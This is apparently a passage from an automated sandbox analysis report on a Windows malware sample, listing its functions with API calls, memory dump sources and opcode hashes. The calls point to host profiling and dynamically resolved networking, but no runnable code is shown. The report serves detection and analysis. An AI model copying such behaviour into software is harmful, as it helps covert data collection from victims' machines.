                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: caee8445d23baae34f2d6fab6250ad29ef57070fd72bc7aaf541c2dc73b6bda6
                              • Instruction ID: 4151da2915ce901ee0497f52da5a7fecae21284c25cc8929b9e6bb60a7a06daf
                              • Opcode Fuzzy Hash: caee8445d23baae34f2d6fab6250ad29ef57070fd72bc7aaf541c2dc73b6bda6
                              • Instruction Fuzzy Hash: 41112E7160421AAFEB10DFA9EC88EBE7B6DFB44710F14415DF91597280EB38AD408B69
                              Function 005B5AF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5B34
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 005B5B9C
                              • memmove.MSVCRT(00000000,?,?), ref: 005B5BA9
                              • memmove.MSVCRT(00000000,?,?), ref: 005B5BB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long
                              • API String ID: 2052693487-3788999226
                              • Opcode ID: 493370702132029ae187c80189cd4eaf606600753dcf242c5d495f6d3243e0ab
                              • Instruction ID: b1d76ac77a3fabc489a40c25534c2c0d633221e788bd8aa359f9c9e5396046a1
                              • Opcode Fuzzy Hash: 493370702132029ae187c80189cd4eaf606600753dcf242c5d495f6d3243e0ab
                              • Instruction Fuzzy Hash: 57416D75A005159FCF08DFACC995BAEBBB5FB88310F148229E919E7384E670AD00CB90
                              Function 005A7DC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7DD8
                                • Part of subcall function 005BA1F0: std::exception::exception.LIBCMT ref: 005BA205
                                • Part of subcall function 005BA1F0: std::exception::exception.LIBCMT ref: 005BA22B
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7DF6
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7E11
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$std::exception::exception
                              • String ID: invalid string position$string too long
                              • API String ID: 3310641104-4289949731
                              • Opcode ID: fa52c8778daed962f5954feb280abe640f1f877373474747ac64213678ce9521
                              • Instruction ID: d3d82c340b334e49066cc18b310ba17fb24eeeaa83f8b573f39c4e3a0723b4b9
                              • Opcode Fuzzy Hash: fa52c8778daed962f5954feb280abe640f1f877373474747ac64213678ce9521
                              • Instruction Fuzzy Hash: 8B2193323046058BD720DE7CDC80A2EFBE9FF9A710F204A6EE456CB241E771AC4083A1
                              Function 005B3360 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005B338F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B3396
                              • GlobalMemoryStatusEx.KERNEL32 ref: 005B33B1
                              • wsprintfA.USER32 ref: 005B33D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB
                              • API String ID: 2922868504-2651807785
                              • Opcode ID: c8d6934966f4137e5ed021acfc59aa9f041f21384f8f5bcc15bea8be54e83baa
                              • Instruction ID: 8727025dbe3401f825d55bf027d2745832f5373756ccd141e09969e1cad73e84
                              • Opcode Fuzzy Hash: c8d6934966f4137e5ed021acfc59aa9f041f21384f8f5bcc15bea8be54e83baa
                              • Instruction Fuzzy Hash: 2C01B971A04214AFD7049F98CD49FAEBBB8FB44710F10452DF906E7390D77859008695
                              Function 005A7700 Relevance: 7.9, APIs: 5, Instructions: 406stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005B4800: LoadLibraryA.KERNEL32(ws2_32.dll,?,005A7741), ref: 005B4806
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,connect), ref: 005B481C
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 005B482D
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 005B483E
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,htons), ref: 005B484F
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 005B4860
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,recv), ref: 005B4871
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,socket), ref: 005B4882
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 005B4893
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,closesocket), ref: 005B48A4
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,send), ref: 005B48B5
                              • StrCmpCA.SHLWAPI(?,01609708), ref: 005A7770
                              • StrCmpCA.SHLWAPI(?,01609798), ref: 005A7848
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A7880
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A78DD
                                • Part of subcall function 005B7240: lstrcpy.KERNEL32(00000000), ref: 005B725A
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,005BD014), ref: 005A5C15
                                • Part of subcall function 005A5BE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005A5C44
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C75
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C9D
                                • Part of subcall function 005A5BE0: lstrcat.KERNEL32(00000000,00000000), ref: 005A5CA8
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5CD0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AddressProc$FolderLibraryLoadPathlstrcat
                              • String ID:
                              • API String ID: 38527155-0
                              • Opcode ID: fe08859172fae5d1e54630acfd3753f53f6262cba720949f34720ec2df6794fb
                              • Instruction ID: a678abc856079a0daf9a797e372f4e670e32387576f6942a7b4ab60ce997ab17
                              • Opcode Fuzzy Hash: fe08859172fae5d1e54630acfd3753f53f6262cba720949f34720ec2df6794fb
                              • Instruction Fuzzy Hash: 0FF19075A0420A8FCB24DF29C849B9DBBB5BF89314F19C1ADD8089B352D735ED42CB91
                              Function 005A7C0F Relevance: 7.9, APIs: 5, Instructions: 367stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrCmpCA.SHLWAPI(?,01609708), ref: 005A7770
                              • StrCmpCA.SHLWAPI(?,01609798), ref: 005A7848
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A7880
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A78DD
                                • Part of subcall function 005B7240: lstrcpy.KERNEL32(00000000), ref: 005B725A
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,005BD014), ref: 005A5C15
                                • Part of subcall function 005A5BE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005A5C44
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C75
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C9D
                                • Part of subcall function 005A5BE0: lstrcat.KERNEL32(00000000,00000000), ref: 005A5CA8
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5CD0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID:
                              • API String ID: 2938889746-0
                              • Opcode ID: 225fec686754a9acb318094c21a96fadb149b990a84bdbb1c2fdb26c861e9426
                              • Instruction ID: 7e75109ddd8aded9efa8b3bb1e935bbbdbb57e09253888e20e52047de5b4c980
                              • Opcode Fuzzy Hash: 225fec686754a9acb318094c21a96fadb149b990a84bdbb1c2fdb26c861e9426
                              • Instruction Fuzzy Hash: A0F17175A052098FCB64DF29C848A9DBBF1BF89314F19C1ADD8089B362D735ED42CB91
                              Function 005A781D Relevance: 7.9, APIs: 5, Instructions: 365stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrCmpCA.SHLWAPI(?,01609708), ref: 005A7770
                              • StrCmpCA.SHLWAPI(?,01609798), ref: 005A7848
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A7880
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A78DD
                              • StrCmpCA.SHLWAPI(?,01609678), ref: 005A7B7D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 62a8ba956af398c331cf9e411030ce7c85c0fb2c15da07b0d48d47830f75079b
                              • Instruction ID: c03b2a34f8dd060a326337fca528b739e2ca073e0017a14434d602a55b010408
                              • Opcode Fuzzy Hash: 62a8ba956af398c331cf9e411030ce7c85c0fb2c15da07b0d48d47830f75079b
                              • Instruction Fuzzy Hash: 19F17175A052098FCB64DF29C848A9DBBF1BF89314F19C1ADD8089B362D735ED42CB91
                              Function 005A7AE0 Relevance: 7.9, APIs: 5, Instructions: 363COMMON
                              Download Yara Rule
                              APIs
                              • StrCmpCA.SHLWAPI(?,01609708), ref: 005A7770
                              • StrCmpCA.SHLWAPI(?,01609678), ref: 005A7B7D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2ba2608335010477aecd0f34452ed591a8f72330ce55bf875fe0e1bcfee551ab
                              • Instruction ID: fdc5fa721a69d5baec4892e9a6f4e74ee68aa7b0369e6986fc7b1630f4c70cc8
                              • Opcode Fuzzy Hash: 2ba2608335010477aecd0f34452ed591a8f72330ce55bf875fe0e1bcfee551ab
                              • Instruction Fuzzy Hash: C5E17175A042098FCB64DF29C848A5DBBF1BF89314F19C1ADD8089B362D735ED42CB91
                              Function 005AD8C0 Relevance: 7.6, APIs: 5, Instructions: 128registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0160DDA0,00000000,00020119,?,00000000,000000FE), ref: 005AD90C
                              • RegQueryValueExA.ADVAPI32(?,0160E928,00000000,00000000,?,?), ref: 005AD933
                              • RegCloseKey.ADVAPI32(?), ref: 005AD93E
                              • lstrcat.KERNEL32(?,?), ref: 005AD964
                              • lstrcat.KERNEL32(?,0160E760), ref: 005AD976
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: a0b165bef21b21ab9ebc6b7da60cd1507220f53c1ff68b0a010ff2ed7f5c0055
                              • Instruction ID: 21a331f785e70ed6ec2eb4989ecf0699533afbb6158029ddc9e6bbde0d007ec4
                              • Opcode Fuzzy Hash: a0b165bef21b21ab9ebc6b7da60cd1507220f53c1ff68b0a010ff2ed7f5c0055
                              • Instruction Fuzzy Hash: 6D415271214246AFDB54FF24D84AF9F7BA4BBC4304F40882DB98D87251DE34E949CB96
                              Function 005A7F60 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A7FB1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A7FE0
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A8025
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A8053
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A8087
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
